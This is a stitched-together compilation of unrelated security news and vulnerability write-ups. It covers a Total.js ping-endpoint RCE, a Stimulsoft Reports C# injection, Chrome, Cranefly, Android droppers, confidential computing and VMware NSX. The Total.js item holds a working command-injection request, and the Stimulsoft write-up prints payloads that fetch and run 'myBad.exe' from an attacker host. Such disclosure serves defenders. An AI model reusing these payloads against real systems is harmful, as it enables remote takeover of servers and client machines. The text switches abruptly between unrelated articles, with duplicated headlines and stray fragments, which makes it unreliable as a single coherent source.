In Total.js 4 before 0e5ace7, /api/common/ping can achieve remote command execution via shell metacharacters in the host parameter.

Using the API /api/common/ping it's possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.

    POST /api/common/ping HTTP/1.1
    Host: 0.0.0.0:8000
    User-Agent: bla-bla-bla
    Cookie: your-auth-cookie
    Content-Length: 15
    
    host=1.1.1.1;id
    

	schema.addWorkflow('ping', function($) {
		var host \= $.model.host.replace(/'|"|\\n/g, '');
		Exec('ping -c 3 {0}'.format(host), $.done(true));
	});

Here the problem is the fact that the server doesn't sanitize correctly the input checking that the host provided is a legitimate one, allowing also characters like ;, | or &.

CVE-2022-44019: [Security] Remote command execution · Issue #12 · totaljs/code

Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user's local machine, as demonstrated by System.Diagnostics.Process.Start.

Similar to CVE-2020-15865. However, this one was a little trickier because I could only execute chained C# commands that ultimately return an Object. This is a technique that can be used anywhere where user input is compiled by design, such as in template injection. In fact, hackers I've shared this story with had success using the concept across different languages and systems.

**Information Disclosure to RCE** 

This started with a low severity issue - a verbose error message from the application when I typed SQL junk into the Report Editor, looking for a SQL injection. The errors contained CS1503 (C# compilation errors) returned from Stimulsoft Reports 2013.1.1600.0, so I was confident there was an RCE available: 

So, after trying a few C# commands, I eventually I got errors like:

 C:\\User\\burninator\\AppData\\Local\\Temp\\klqskh4k.0.cs(578,74): error CS1502: The best overloaded method match for '\*\*\*\*.ToString(object,object,bool)' has some invalid arguments: error CS1503: Argument 2: cannot convert from method group' to 'object' 

Bingo! I love to hear that something is being converted, and in a function we apparently have control over. This error is a wonderful window into how this works. I can tell from the error that it will only compile and execute successfully if we give it something that it can interpret as an Object. I tested this by sending {new Object()}, and it compiled without error! These work too but they're not that helpful (yet): 

{new System.Diagnostics.Process()}

{System.Math.Ceiling} 

{new System.Diagnostics.StackTrace(true).GetFrame(1).GetMethod()}

So, how can I weaponize this? Since this is a local thick client application, the first step is to figure out if it's going to execute these commands locally or on the application web server it's connected to. Surprise! It actually does both, since I was able to chain this with other functionality to make it launch server side AND locally. But first let's find proof that we can inject a malicious command... 

To find out, I read the manual. I actually READ the manual for the C# language. I know, I know. Disgusting. It's a taboo I didn't even do and would never have done when I was a developer. But it was important here, because I needed to find attack chains that would let me: 

1.)  execute a command on the local machine (pop calc.exe) 

2.) execute a command locally to make the remote server do an external DNS hit POC and then make it download/write/execute the file  

It reminded me a lot of Object Deserialization gadget/widget chains in YsoSerial, which are well known internal commands or system objects that aid with command injection and execution (i.e.http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html ). But given my constraints, I had to create my own. If you aren't familiar with Objects in Object Oriented Programming languages, here's a quick rundown from my presentation on Object Attacks and how I used them in this context. The class definitions are from the C# manual:

 

{System.IO.File.ReadAllText(@"dontlook.txt")} 

(NOTE: the curly brackets are for the templating system, they're not valid C#)  

 

{System.Net.WebRequest.Create("https://ATTACKSERVER:8000/myBad.exe").GetResponse().GetResponseStream()}  

 

{System.Diagnostics.Process.Start("myBad.exe")}  

That's how I got one of the weirdest shells ever.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42777  

Also, now that I've written this out, I realize that by far the least fun part of this exploit was reading the C# manual to find interesting File IO and Networking gadget chains that return Objects... it was a lot of 2am nights. So I think I will end up automating that process, if something like it doesn't already exist.

CVE-2021-42777: Reporting Library RCE (Object Chaining) - CVE-2021-42777

Plus: The New York Post gets hacked, a huge stalkerware network is exposed, and the US claims China interfered with its Huawei probe.

For years, AlphaBay ruled the dark web. If you were in the market to buy drugs or stolen credit cards, the digital bazaar was the place to turn. At its peak, more than 350,000 products were listed for sale—an estimated 10 times the size of the notorious Silk Road market—and the website proved to be the ire of law enforcement the world round. That was until cops took AlphaBay offline in 2017.

This week, WIRED published the first in a six-part series detailing the hunt for Alpha02, the mastermind believed to be behind AlphaBay, and the huge international takedown operation that wiped the marketplace from the web. Each week, we’ll publish a new part of the series, excerpted from WIRED reporter Andy Greenberg’s new book, _Tracers in the Dark_.

Schools across the US have faced dozens of hoax calls about mass shootings in recent months. After a call is made, police scramble to the scene fearing the worst, only to find out there is no shooter. Now hoax phone call recordings obtained by WIRED and conversations with law enforcement officials reveal how the calls have been made and show that law enforcement officials are closing in on the alleged hoaxer. Police are looking for a male “with a heavy accent described as Middle Eastern or African” and have linked the phone calls to Ethiopia.

Elsewhere, a bug in Apple’s new macOS 13 Ventura operating system is causing problems for malware scanners and security monitoring tools. With the new software update, Apple accidentally crippled third-party security products in a way users may not notice. The company is planning to fix the bug in an upcoming software release.

We also looked at a newly discovered Chinese influence operation that is targeting US elections—although it is not having much success. And now that Elon Musk owns Twitter, here’s how you should think about your privacy and security on the bird website.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

Officials in Canada and the Netherlands are investigating allegations that Chinese police forces have operated a network of illegal police stations within their countries. According to reports that emerged this week, Chinese police forces have been operating out of clandestine bases and using their presence to track and threaten dissidents. The Dutch government has called such sites “illegal” and said it is “investigating exactly what they are doing here,” while officials in Canada said they are investigating “so-called ‘police’ stations.”

However, it is just the tip of the iceberg. Spanish civil rights group Safeguard Defenders first claimed that Chinese police forces from the cities of Fuzhou and Qingtian were running “overseas police service stations” across the West in a report published in September. Since 2018, the group claims, more than 38 police service stations have appeared in “dozens of countries” spread across five different continents. “Such overseas police ‘service stations’ have been used by police back in China to carry out such ‘persuasion to return’ operations on foreign soil, including in Europe,” the report states. Lawmakers in both England and Scotland are also planning on investigating the stations, reports say.

Chinese officials have not denied the existence of the service stations, but say they exist to provide bureaucratic services to Chinese citizens and don’t involve police operations. The Chinese embassy in Canada said the stations exist to allow Chinese citizens to complete tasks such as renewing their driving licenses: “The main purpose of the service station abroad is to provide free assistance to overseas Chinese citizens in this regard.”

If stalkerware is installed on your phone or laptop, the malicious software can send every tap, message, and photo back to the person who added it to your device. The software is often hard to find, and the insidious industry that creates it operates in the shadows. This week, a TechCrunch investigation revealed how a huge stalkerware network, with hundreds of thousands of victims, operates.

Leaked data obtained by TechCrunch shows TheTruthSpy stalkerware has been installed on more than 300,000 devices and has victims all around the world. Over a six-week period analyzed by the publication, more than 9,400 new devices were infected with the stalkerware. Thousands of calls, millions of text messages, and more than 470,000 photos and videos were collected by the app without its victims’ knowledge. And data was also likely collected from the phones of children. This tool can tell if your device was compromised.

A pair of Chinese intelligence officers attempted to bribe a US official involved in the criminal case against Huawei, the US Department of Justice claimed this week. Across three separate cases, the Justice Department charged 13 people with alleged efforts to “exert influence” in the US on behalf of the People’s Republic of China. The charges range from trying to disrupt the US government’s Huawei investigation to trying to recruit people as intelligence agents. Two people were also arrested for allegedly attempting to “cause the forced repatriation” of a Chinese national living in the US. “The actions announced today take place against a backdrop of malign activity from the government of the People’s Republic of China that includes espionage, attempts to disrupt our justice system, harassment of individuals, and ongoing efforts to steal sensitive US technology,” deputy attorney general Lisa O. Monaco said in a statement. In an unprecedented move in July, the head of the FBI and the UK’s MI5 made a joint public appearance to warn about the perceived threat from China, saying the nation is the biggest threat to economic and national security.

The website and Twitter account of the _New York Post_ were hacked this week. On Thursday, the publication’s Twitter account started sharing links to stories with offensive headlines and posts about politicians. US president Joe Biden, US representative Alexandria Ocasio-Cortez, and New York governor Kathy Hochul were all targeted. The _Post_, which is owned by News Corp, tweeted that it was investigating the incident, but very few details have been made public so far. In February this year, News Corp announced it had been hacked, with the attackers believed to have accessed journalists’ emails. The latest attack against the _Post_ echoes a recent hack of the business news website _Fast Company_. In September, the publication’s content management system (CMS) was breached and the attacker sent offensive push notifications to Apple News subscribers.

China Operates Secret ‘Police Stations’ in Other Countries

Categories: Exploits and vulnerabilities
Categories: News
Google has issued an update for Chrome to fix an issue in the V8 JavaScript engine



(Read more...)




The post A Chrome fix for an in-the-wild exploit is out—Check your version appeared first on Malwarebytes Labs.

Google has announced an update for Chrome that fixes an in-the-wild exploit. Chrome Stable channel has been updated to 107.0.5304.87 for Mac and Linux, and 107.0.5304.87/.88 for Windows.

The vulnerability at hand is described as a type confusion issue in the V8 Javascript engine.

**Mitigation**

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. Most of the time, the easiest way to update Chrome is to do nothing—it should update itself automatically, using the same method as outlined below but without your involvement. However, if something goes wrong—such as an extension blocking the update—or if you never close your browser, you can end up lagging behind on your updates.

So, it doesn’t hurt to check now and again. And now would be a good time, given the severity of the vulnerabilities in this batch.

My preferred method is to have Chrome open the page chrome://settings/help, which you can also find by clicking **Settings > About Chrome**.

Updating Chrome

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

Chrome is up to date

After the update the version should be 107.0.5304.87 or later.

**CVE-2022-3723**

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

This is the one that urged the out of bounds update was CVE-2022-3723, a type confusion issue with Chrome's V8 JavaScript engine. A remote attacker could exploit this vulnerability to trigger data manipulation on the targeted system.

Type confusion is possible when a piece of code doesn’t verify the type of object that is passed to it. The program allocates or initializes an object using one type, but it later accesses it using a type that is incompatible with the original. Details about the vulnerability will not be released before everyone has had a chance to update, but it seems that in this case the manipulation with an unknown input can lead to privilege escalation.

The V8 engine is a very important component within Chrome that's used to process JavaScript commands. A very similar vulnerability was found in March of 2022. This was also a type confusion issue in the V8 engine, which turned out to affect other Chromium based browsers as well. So keep an eye out for updates on any other Chromium based browser you may be using, such as Edge.

A Chrome fix for an in-the-wild exploit is out—Check your version

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 21 and Oct. 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 21 to October 28

The threat actor uses commands from legitimate IIS logs to communicate with custom tools in a savvy bid to hide traces of its activity on victim machines.

Hacking group Cranefly is using the new technique of using Internet Information Services (IIS) commands to deliver backdoors to targets and carry out intelligence-gathering campaigns.

Researchers at Symantec have observed a previously undocumented dropper Trojan called Geppei being used to install backdoors (including Danfuan and Regeorg) and other custom tools on SAN arrays, load balancers, and wireless access point (WAP) controllers that may lack appropriate security tools, according to a blog post on Oct. 28.

In examining the activity, the team noticed that Cranefly is using ISS logs to communicate with Geppei.

"The technique of reading commands from IIS logs is not something Symantec researchers have seen being used to date in real-world attacks, making it novel," Brigid O Gorman, senior intelligence analyst on Symantec’s Threat Hunter team, tells Dark Reading. "It is a clever way for the attacker to send commands to its dropper."

ISS logs record data such as webpages visited and apps used. The Cranefly attackers are sending commands to a compromised Web server by disguising them as Web access requests; IIS logs them as normal traffic, but the dropper can read them as commands, if they contain the strings Wrde, Exco, or Cllo, which don't normally appear in IIS log files.

"These appear to be used for malicious HTTP request parsing by Geppei — the presence of these strings prompts the dropper to carry out activity on a machine," Gorman notes. "It is a very stealthy way for attackers to send these commands."

The commands contain malicious encoded .ashx files, and these files are saved to an arbitrary folder determined by the command parameter and they run as backdoors (i.e., ReGeorg or Danfuan).

Gorman explains that the technique of reading commands from IIS logs could in theory be used to deliver different types of malware if leveraged by threat actors with different goals.

"In this instance, the attackers leveraging it are interested in intelligence gathering and delivering backdoors, but that doesn't mean this technique couldn't be used to deliver other types of threats in the future," she says.

In this case, to date, the Symantec threat team has found evidence of attacks against just a handful of victims.

"That is not unusual for groups focused on espionage, as these attacks tend to be focused on a small number of selected victims," Gorman explains.

**Cranefly: A Threat of Reasonable Sophistication**

Gorman explains that the development of custom malware and new techniques requires a certain level of skills and resources that not all threat actors have.

"It implies that those behind Cranefly have a certain level of skills that makes them capable of carrying out stealthy and innovative cyberattacks," she says, noting the gang also takes steps to cover up its activity on victim machines.

The dropped malicious backdoors are removed from victim machines if the Wrde command is called with a specific option ("r").

"A step like that displays quite a high level of operational security by the group," she adds.

**Deploying an In-Depth Defense Strategy**

Gorman says that the typical rules apply to defending against Cranefly as they do when it comes to most types of cyberattacks: Organizations should adopt a defense-in-depth strategy, using multiple detection, protection, and hardening technologies to mitigate risk at each point of a potential attack chain.

"Organizations should also be aware of and monitor the use of dual-use tools inside their network," she says, noting that Symantec would also advise implementing proper audit and control of administrative account usage.

"We'd also suggest creating profiles of usage for admin tools as many of these tools are used by attackers to move laterally undetected through a network," she says. "Across the board, multifactor authentication (MFA) can help limit the usefulness of compromised credentials."

Cranefly Cyberspy Group Spawns Unique ISS Technique

New technologies designed into processors allow enterprises to leverage cloud advantages while meeting privacy regulations.

Data security in the public cloud has been a concern since the computing medium emerged in the mid-2000s, but cloud providers are allaying fears of theft with a new concept: confidential computing.

Confidential computing involves creating an isolated vault on hardware — also called a trusted execution environment — in which encrypted code is protected and stored. The code is accessible only to applications with the right keys, which are usually a combination of numbers, to unlock and then decrypt it. A process called attestation verifies all is correct, minimizing the chances of unauthorized parties stealing or pilfering the data.

Confidential computing offers the "ultimate in data protection," said Mark Russinovich, chief technology officer at Microsoft Azure, during a streamed session at the company's Ignite conference in October.

"Because it is inside the enclave, protected by hardware, nothing outside can see that data or tamper with it," he said. "That includes people with physical access to the server, the server administrator, the hypervisor, and the administrator of an application."

Confidential computing allows companies to migrate workloads that rely heavily on data privacy and security to the cloud, analysts say. Companies in highly regulated industries like healthcare and finance can move to cloud services while maintaining their security posture.

**Spying the Holes in the Clouds**

Since its early days, the utilitarian appeal of cloud computing, in terms of pricing and flexibility, largely drowned security concerns. The most vocal criticism of cloud computing was the prospect of privacy being impossible to ensure because guest workloads could not be completely isolated from the host system, says James Sanders, principal analyst for cloud, infrastructure, and quantum computing at technology research firm CCS Insight.

"However, the disclosure of the Spectre and Meltdown vulnerabilities in 2018 demonstrated the potential for a malicious cloud tenant to exfiltrate data from the workloads of other processes on the same host system," Sanders says.

The vulnerabilities exposed to hackers confidential information leaving secure enclaves. The twin attacks also pushed along the wider idea of confidential computing, in which encrypted code was accessible to only authorized parties but would not leave isolated enclaves.

Confidential computing prevents bad guys from breaking into servers and stealing secrets, says Steve Leibson, principal analyst at Tirias Research.

"The state-sponsored \[attacks\] are the most difficult and the most sophisticated," he says. "So at this point you really have to think about protecting data in use, in motion, and stored. It must be encrypted in all three situations."

**Grounding Confidential Computing in Silicon**

Confidential computing is changing the way hardware makers and cloud providers think about applications on virtual machines and not directly on processors, Leibson says.

"When we ran on processors, we didn't need attestation because nobody was going to alter a Xeon," he says. "But a virtual machine — that's just software. You can alter it. Attestation is trying to provide the same sort of rigidity to software machines as silicon does for hardware processors."

Chip makers have since taken a security-first approach in chip design, and it has trickled down to cloud offerings. Last month Google, Nvidia, Microsoft, and AMD jointly announced a specification called Caliptra to establish a secure layer on chips where the data can be protected and trusted. The specification protects the boot sector, provides attestation layers, and safeguards against conventional hardware hacking, such as glitching and side-channel attacks. Caliptra is managed by the Open Compute Project and Linux Foundation.

"We are looking ahead to future innovations in confidential computing and varied use cases that require chip-level attestation at the level of a package or system on a chip (SoC)" with Caliptra, wrote Parthasarathy Ranganathan, vice president and technical fellow at Google, in a blog entry posted during the Google Cloud Next event that took place in mid-October.

Google already has its own confidential computing technology called OpenTitan, which is mainly focused on protecting the boot sector.

Microsoft's previous efforts at confidential computing relied on partial enclaves rather than protecting the entire host system, CCS Insight's Sanders says. However, this month the company announced Azure virtual machines with confidential computing based on technology baked into Epyc, a server processor from AMD. AMD's SNP-SEV encrypts data when it is loaded into a CPU or GPU, which protects data while being processed.

**Clearing the Way to Real-World Compliance**

For enterprises, confidential computing offers an ability to secure data in the public cloud as required by regulations like Europe's General Data Protection Regulation and the United States' Health Insurance Portability and Accountability Act, analysts say.

"Availability of administrator-proof encryption in the cloud undercuts one of the longest-serving anti-cloud talking points, since shielding workloads from the cloud platform operator effectively eliminates the largest remaining source of risk preventing adoption of public cloud," Sanders says.

The AMD technology appeared in general-purpose virtual machines earlier this year, but the announcements at Ignite extends the technology to Azure Kubernetes Service, which provides additional security for cloud-native workloads. The AMD technology on Azure is also designed for use in bring-your-own-device workplaces, remote work, and graphics-intensive applications.

Cloud Providers Throw Their Weight Behind Confidential Computing

Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur, which are capable of stealing financial data and performing on-device fraud.
"These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric

Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur, which are capable of stealing financial data and performing on-device fraud.

"These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric told The Hacker News in a statement.

"This evolution includes following newly introduced policies and masquerading as file managers and overcoming limitations by side-loading the malicious payload through the web browser."

Targets of these droppers include 231 banking and cryptocurrency wallet apps from financial institutions in Italy, the U.K., Germany, Spain, Poland, Austria, the U.S., Australia, France, and the Netherlands.

Dropper apps on official app stores like Google Play have increasingly become a popular and efficient technique to distribute banking malware to unsuspecting users, even as the threat actors behind those campaigns continually refine their tactics to bypass restrictions imposed by Google.

The list of malicious apps, four of which are still available on the digital marketplace, is below -

*   Codice Fiscale 2022 (com.iatalytaxcode.app) - 10,000+ downloads
*   File Manager Small, Lite (com.paskevicss752.usurf) - zero downloads
*   My Finances Tracker (com.all.finance.plus) - 1,000+ downloads
*   Recover Audio, Images & Videos (com.umac.recoverallfilepro) - 100,000+ downloads
*   Zetter Authenticator (com.zetter.fastchecking) - 10,000+ downloads

The latest wave of SharkBot attacks aimed at Italian banking users since the start of October 2022 entailed the use of a dropper that masqueraded as an to determine the tax code in the country ("Codice Fiscale 2022").

While Google's Developer Program Policy limits the use of the REQUEST\_INSTALL\_PACKAGES permission to prevent it from being abused to install arbitrary app packages, the dropper, once launched, gets around this barrier by opening a fake Google Play store page impersonating the app listing, leading to the download of the malware under the guise of an update.

Outsourcing the malware retrieval to the browser is not the only method adopted by criminal actors. In another instance spotted by ThreatFabric, the dropper posed as a file manager app, which, per Google's revised policy, is a category that's allowed to have the REQUEST\_INSTALL\_PACKAGES permission.

Also spotted were three droppers that offered the advertised features but also came with a covert function that prompted the users to install an update upon opening the apps and grant them permission to install apps from unknown sources, leading to the delivery of Vultur.

The new variant of the trojan is notable for adding capabilities to extensively log user interface elements and interaction events (e.g., clicks, gestures, etc.), which ThreatFabric said could be a workaround to the use of the FLAG\_SECURE window flag by banking apps to prevent them from being captured in screenshots.

The findings from ThreatFabric also come as Cyble uncovered an upgraded version of the Drinik Android trojan that targets 18 Indian banks by impersonating the country's official tax department app to siphon personal information through the abuse of the accessibility services API.

"Distribution through droppers on Google Play still remains the most 'affordable' and scalable way of reaching victims for most of the actors of different levels," the company noted.

"While sophisticated tactics like telephone-oriented attack delivery require more resources and are hard to scale, droppers on official and third-party stores allow threat actors to reach a wide unsuspecting audience with reasonable efforts."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

These Dropper Apps On Play Store Targeting Over 200 Banking and Cryptocurrency Wallets

A recently discovered hacking group known for targeting employees dealing with corporate transactions has been linked to a new backdoor called Danfuan.
This hitherto undocumented malware is delivered via another dropper called Geppei, researchers from Symantec, by Broadcom Software, said in a report shared with The Hacker News.
The dropper "is being used to install a new backdoor and other tools

A recently discovered hacking group known for targeting employees dealing with corporate transactions has been linked to a new backdoor called **Danfuan**.

This hitherto undocumented malware is delivered via another dropper called Geppei, researchers from Symantec, by Broadcom Software, said in a report shared with The Hacker News.

The dropper "is being used to install a new backdoor and other tools using the novel technique of reading commands from seemingly innocuous Internet Information Services (IIS) logs," the researchers said.

The toolset has been attributed by the cybersecurity company to a suspected espionage actor called UNC3524, aka Cranefly, which first came to light in May 2022 for its focus on bulk email collection from victims who deal with mergers and acquisitions and other financial transactions.

One of the group's key malware strains is QUIETEXIT, a backdoor deployed on network appliances that do not support antivirus or endpoint detection, such as load balancers and wireless access point controllers, enabling the attacker to escape detection for extended periods of time.

Geppei and Danfuan add to Cranefly's custom cyber weaponry, with the former acting a dropper by reading commands from IIS logs that masquerade as harmless web access requests sent to a compromised server.

"The commands read by Geppei contain malicious encoded .ashx files," the researchers noted. "These files are saved to an arbitrary folder determined by the command parameter and they run as backdoors."

This includes a web shell called reGeorg, which has been put to use by other actors like APT28, DeftTorero, and Worok, and a never-before-seen malware dubbed Danfuan, which is engineered to execute received C# code.

Symantec said it hasn't observed the threat actor exfiltrating data from victim machines despite a long dwell time of 18 months on compromised networks.

"The use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim machines, indicate that Cranefly is a fairly skilled threat actor," the researchers concluded.

"The tools deployed and efforts taken to conceal this activity \[...\] indicate that the most likely motivation for this group is intelligence gathering."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Stealthy Techniques Used by Cranefly Espionage Hackers

Bug fixed despite product reaching end of life

Bug fixed despite product reaching end of life

  

VMWare has patched a critical vulnerability in the management service for NSX, its network virtualization and security platform.

The vulnerability, caused by an old deserialization bug in an outdated Java library, could be abused to achieve pre-authentication remote code execution (RCE) on the host computer.

Due to the bug’s criticality, VMWare issued a patch despite the product having reached end-of-life status. The vulnerability is a reminder of the security challenges of managing open source software dependencies.

**Deserialization bugs**

Discovered and documented by security researcher Sina Kheirkhah, the main culprit in the VMWare NSX Manager flaw was XStream, a library for converting Java objects to XML format and vice versa (aka marshalling/unmarshalling).

XStream supports the marshalling and unmarshalling of a wide range of Java objects, even those that don’t support the Serializable interface.

This has made XStream an attractive launchpad for various code injection attacks. Security researcher Alvaro Muñoz documented RCE attacks with XStream in 2013, research that greatly helped Kheirkhah in discovering the VMWare vulnerability.

To go from unmarshalling to code execution on the host machine, the attacker would have to hook several Java features including dynamic proxies, event handlers, and method closure. This allowed the attacker to instantiate the class and invoke the method that runs commands on the system.

**Exploit on VMWare NSX Manager**

Versions of XStream up to 1.4.18 are vulnerable to this kind of deserialization attack. Kheirkhah discovered that VMWare NSX Manager used v1.4.18. The next step was to find an endpoint that could allow him to exploit the vulnerability.

“Java is very wild and there are so many scenarios that something can go wrong and end up in RCE on a popular appliance/software,” Kheirkhah told The Daily Swig. “I spent weeks studying how this certain VMWare product works which, eventually after spending so much time, it led to me to the discovery of the vulnerability.”

Kheirkhah first found an endpoint through which he could exploit the bug on NSX Manager. However, this endpoint required authenticated access.

With the help of security researcher Steven Seeley, Kheirkhah was able to access XStream through the password reset endpoint, which led to pre-authentication RCE on the NSX Manager host.

“This vulnerability allowed unauthenticated remote code execution as the root user on the target VMWare product,” Kheirkhah said.

Kheirkhah posted a proof of concept that shows how an attacker could gain shell access to the NSX Manager server.

**Lessons learned**

Even though the product had reached its end of life, VMWare patched it because it evaluated the severity of the bug to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

“While VMware does not mention end-of-life products on VMware Security Advisories, due to the critical severity of NSX-V the product team has made a patch available,” VMWare stated in an advisory.

“Deserialization vulnerabilities have been around for many years and will never go away,” Kheirkhah said.

“Even today you can notice how many new serialization libraries are getting introduced every day and how talented researchers are analyzing the security of these libraries and how it’s possible to abuse the deserialization process.”

Kheirkhah also underlined the importance of carefully handling the dependency chain of open source software. “Keeping track of dependencies and making sure they’re up to date is vital for securing your software,” he stressed.

The Daily Swig has reached out to VMWare for comments. We will update this post if we hear back from them.

YOU MAY ALSO LIKE Jira Align flaws enabled malicious users to gain super admin privileges – and potentially worse

Tag

#mac